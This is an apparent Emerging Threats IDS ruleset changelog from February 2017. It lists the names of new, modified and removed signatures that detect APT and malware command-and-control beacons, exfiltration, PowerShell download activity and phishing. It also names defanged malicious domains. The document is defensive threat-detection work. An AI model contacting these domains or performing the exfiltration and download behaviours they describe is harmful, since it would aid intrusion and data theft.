Daily Ruleset Update Summary 2017/02/16

[***] Summary: [***]

56 Open signatures, 76 new Pro (56 + 20). (?:Mini|Cosmic)Duke, MAGICHOUND, Satan Ransomware.

Thanks: @J0hnnyXm4s and @cyber_attacks.

[+++]          Added rules:          [+++]

2023909 - ET TROJAN Miniduke variant C&C activity (trojan.rules)
2023910 - ET TROJAN CosmicDuke Exfiltrating Data via FTP STOR (trojan.rules)
2023911 - ET TROJAN Miniduke variant FTP upload (trojan.rules)
2023912 - ET TROJAN APT28 SEDNIT Variant CnC Beacon 1 (trojan.rules)
2023913 - ET TROJAN APT28 SEDNIT Variant CnC Beacon 2 (trojan.rules)
2023914 - ET TROJAN APT28 SEDNIT Variant CnC Beacon 3 (trojan.rules)
2023915 - ET TROJAN APT28 SEDNIT Variant CnC Beacon 4 (trojan.rules)
2023916 - ET TROJAN APT28 Uploader Variant CnC Beacon (trojan.rules)
2023917 - ET TROJAN APT28 Uploader Variant Fake Request to Google (trojan.rules)
2023918 - ET TROJAN MiniDuke CnC Beacon (string1_slide_1_1) (trojan.rules)
2023919 - ET TROJAN MiniDuke CnC Beacon (string1_slide_1_2) (trojan.rules)
2023920 - ET TROJAN MiniDuke CnC Beacon (string1_slide_2_1) (trojan.rules)
2023921 - ET TROJAN MiniDuke CnC Beacon (string1_slide_2_2) (trojan.rules)
2023922 - ET TROJAN MiniDuke CnC Beacon (string1_slide_3_1) (trojan.rules)
2023923 - ET TROJAN MiniDuke CnC Beacon (string1_slide_3_2) (trojan.rules)
2023924 - ET TROJAN MiniDuke CnC Beacon (string2_slide_1_1) (trojan.rules)
2023925 - ET TROJAN MiniDuke CnC Beacon (string2_slide_1_2) (trojan.rules)
2023926 - ET TROJAN MiniDuke CnC Beacon (string2_slide_2_1) (trojan.rules)
2023927 - ET TROJAN MiniDuke CnC Beacon (string2_slide_2_2) (trojan.rules)
2023928 - ET TROJAN MiniDuke CnC Beacon (string2_slide_3_1) (trojan.rules)
2023929 - ET TROJAN MiniDuke CnC Beacon (string2_slide_3_2) (trojan.rules)
2023930 - ET TROJAN Miniduke Variant CnC Beacon via WebDAV (trojan.rules)
2023931 - ET TROJAN APT29 Cache_DLL SSL Cert (trojan.rules)
2023932 - ET TROJAN Qadars CnC DNS Lookup (zkdef09i7ola . net) (trojan.rules)
2023933 - ET MOBILE_MALWARE Trojan-Spy.AndroidOS.Femas.b CnC Beacon (mobile_malware.rules)
2023934 - ET MOBILE_MALWARE Trojan-Spy.AndroidOS.Femas.b Apps List Exfil (mobile_malware.rules)
2023935 - ET MOBILE_MALWARE Trojan-Spy.AndroidOS.Femas.b DNS Lookup (mobile_malware.rules)
2023936 - ET MOBILE_MALWARE Trojan-Spy.AndroidOS.Femas.b DNS Lookup (mobile_malware.rules)
2023937 - ET MOBILE_MALWARE Trojan-Spy.AndroidOS.Femas.b DNS Lookup (mobile_malware.rules)
2023938 - ET MOBILE_MALWARE Trojan-Spy.AndroidOS.Femas.b DNS Lookup (mobile_malware.rules)
2023939 - ET MOBILE_MALWARE Trojan-Spy.AndroidOS.Femas.b DNS Lookup (mobile_malware.rules)
2023940 - ET TROJAN MAGICHOUND.MPK Activity via IRC (trojan.rules)
2023941 - ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M1 (trojan.rules)
2023942 - ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M2 (trojan.rules)
2023943 - ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M3 (trojan.rules)
2023944 - ET TROJAN Possibly Malicious Double Base64 Unicode Net.ServicePointManager M1 (trojan.rules)
2023945 - ET TROJAN Possibly Malicious Double Base64 Unicode Net.ServicePointManager M2 (trojan.rules)
2023946 - ET TROJAN Possibly Malicious Double Base64 Unicode Net.ServicePointManager M3 (trojan.rules)
2023947 - ET TROJAN Possible Malicious PowerSploit PowerShell Script Observed over HTTP (trojan.rules)
2023948 - ET TROJAN MAGICHOUND.FETCH Retrieving Malicious PowerShell (trojan.rules)
2023949 - ET TROJAN Likely MAGICHOUND.FETCH Receiving PowerSploit PowerShell over HTTP (trojan.rules)
2023950 - ET TROJAN MAGICHOUND.RETRIEVER CnC Beacon (trojan.rules)
2023951 - ET TROJAN MAGICHOUND.FETCH CnC Beacon (trojan.rules)
2023952 - ET TROJAN MAGICHOUND.FETCH SSL Cert (trojan.rules)
2023953 - ET TROJAN MAGICHOUND-related DNS Lookup (chrome-up .date) (trojan.rules)
2023954 - ET TROJAN MAGICHOUND-related DNS Lookup (timezone .live) (trojan.rules)
2023955 - ET TROJAN MAGICHOUND-related DNS Lookup (servicesystem .serveirc.com) (trojan.rules)
2023956 - ET TROJAN MAGICHOUND-related DNS Lookup (analytics-google .org) (trojan.rules)
2023957 - ET TROJAN MAGICHOUND-related DNS Lookup (com-adm .in) (trojan.rules)
2023958 - ET TROJAN MAGICHOUND-related DNS Lookup (microsoftexplorerservices .cloud) (trojan.rules)
2023959 - ET TROJAN MAGICHOUND-related DNS Lookup (msservice .site) (trojan.rules)
2023960 - ET TROJAN MAGICHOUND-related DNS Lookup (com-ho .me) (trojan.rules)
2023961 - ET TROJAN MAGICHOUND-related DNS Lookup (ntg-sa .com) (trojan.rules)
2023962 - ET TROJAN MAGICHOUND-related DNS Lookup (briefl .ink) (trojan.rules)
2023963 - ET TROJAN MAGICHOUND.LEASH IRC CnC Beacon (trojan.rules)
2023964 - ET CURRENT_EVENTS Successful WeTransfer Phish Oct 04 2016 (current_events.rules)

Pro:

2824992 - ETPRO TROJAN Win32/Unknown Fake SSL CnC Beacon 3 (cipher suite) (trojan.rules)
2824993 - ETPRO TROJAN Win32/Unknown Fake SSL CnC Beacon 4 (ec_point_formats) (trojan.rules)
2824994 - ETPRO TROJAN Win32/Unknown Fake SSL CnC Beacon 5 (renegotiation_info/blank SNI ) (trojan.rules)
2824995 - ETPRO TROJAN Win32/Unknown Fake SSL CnC Beacon 6 (Server Hello pre-packet) (trojan.rules)
2824996 - ETPRO TROJAN Win32/Unknown Fake SSL CnC Beacon 7 (compress_method/blank SNI) (trojan.rules)
2824997 - ETPRO TROJAN Satan Ransomware .onion Proxy Domain (trojan.rules)
2824998 - ETPRO MOBILE_MALWARE PUA RiskTool.AndroidOS.Dnotua.oe Checkin (mobile_malware.rules)
2824999 - ETPRO MOBILE_MALWARE PUA RiskTool.AndroidOS.Dnotua.oe Checkin 2 (mobile_malware.rules)
2825000 - ETPRO CURRENT_EVENTS Observed Malicious SSL Cert (MalDoc Download) (current_events.rules)
2825001 - ETPRO CURRENT_EVENTS Successful My ADP Phish (set) Feb 16 2017 (current_events.rules)
2825002 - ETPRO CURRENT_EVENTS Successful My ADP Phish Feb 16 2017 (current_events.rules)
2825003 - ETPRO CURRENT_EVENTS Successful Bank of America Phish M1 Feb 16 2017 (current_events.rules)
2825004 - ETPRO CURRENT_EVENTS Successful Bank of America Phish M2 Feb 16 2017 (current_events.rules)
2825005 - ETPRO CURRENT_EVENTS Successful Bank of America Phish M3 Feb 16 2017 (current_events.rules)
2825006 - ETPRO MOBILE_MALWARE Android/Iop.DJ Checkin (mobile_malware.rules)
2825007 - ETPRO CURRENT_EVENTS Paypal Phishing Landing Feb 16 2017 (current_events.rules)
2825008 - ETPRO CURRENT_EVENTS Successful Paypal Phish M1 Feb 16 2017 (current_events.rules)
2825009 - ETPRO CURRENT_EVENTS Successful Paypal Phish M2 Feb 16 2017 (current_events.rules)
2825010 - ETPRO CURRENT_EVENTS Successful Generic Personalized Email Phish Feb 16 2017 (current_events.rules)
2825011 - ETPRO CURRENT_EVENTS Successful DHL Phish Feb 16 2017 (current_events.rules)

[///]     Modified active rules:     [///]

2023814 - ET TROJAN CryptoShield Ransomware Checkin (trojan.rules)
2821129 - ETPRO TROJAN Win32/Unknown Fake SSL CnC Beacon 1 (trojan.rules)
2821148 - ETPRO TROJAN Sharik/Smoke Checkin 2 (trojan.rules)
2823117 - ETPRO INFO DNS TXT Response Contains URL (info.rules)

[---]         Removed rules:         [---]

2808272 - ETPRO TROJAN Miniduke variant FTP upload (trojan.rules)
2808273 - ETPRO TROJAN Miniduke variant C&C activity (trojan.rules)
2812049 - ETPRO TROJAN CosmicDuke Exfiltrating Data via FTP STOR (trojan.rules)
2814358 - ETPRO TROJAN Win32/Slackbot.F Activity via IRC (trojan.rules)
2822374 - ETPRO CURRENT_EVENTS Successful WeTransfer Phish Oct 04 2016 (current_events.rules)
 

Date: 
Thursday, February 16, 2017 - 00:00